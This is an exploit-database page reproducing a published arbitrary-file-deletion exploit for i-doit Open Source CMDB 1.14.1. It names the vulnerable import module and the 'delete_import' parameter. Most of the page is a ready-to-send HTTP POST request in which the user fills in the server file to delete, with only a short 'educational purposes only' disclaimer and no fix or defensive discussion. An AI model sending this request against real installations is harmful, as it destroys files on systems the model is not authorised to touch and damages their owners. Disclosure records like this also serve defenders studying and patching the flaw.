Idoit open source cmdb 1.14.1 arbitrary file deletion Vulnerability / Exploit
Exploits / Vulnerability Discovered : 2020-05-06 |
Type : webapps |
Platform : php
This exploit / vulnerability Idoit open source cmdb 1.14.1 arbitrary file deletion is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: i-doit Open Source CMDB 1.14.1 - Arbitrary File Deletion
# Date: 2020-05-02
# Author: Besim ALTINOK
# Vendor Homepage:
# Software Link:
# Version: v1.14.1
# Tested on: Xampp
# Credit: İsmail BOZKURT
Vulnerable Module ---> Import Module
Vulnerable parameter ---> delete_import
POST /idoit/?moduleID=50¶m=1&treeNode=501&mNavID=2 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 ******************************
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/idoit/?moduleID=50¶m=1&treeNode=501&mNavID=2
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.7.3
Content-type: application/x-www-form-urlencoded; charset=UTF-8
X-i-doit-Tenant-Id: 1
Content-Length: 30
DNT: 1
Connection: close
Cookie: PHPSESSID=bf21********************************68b8
delete_import=Type the filename, you want to delete from the server here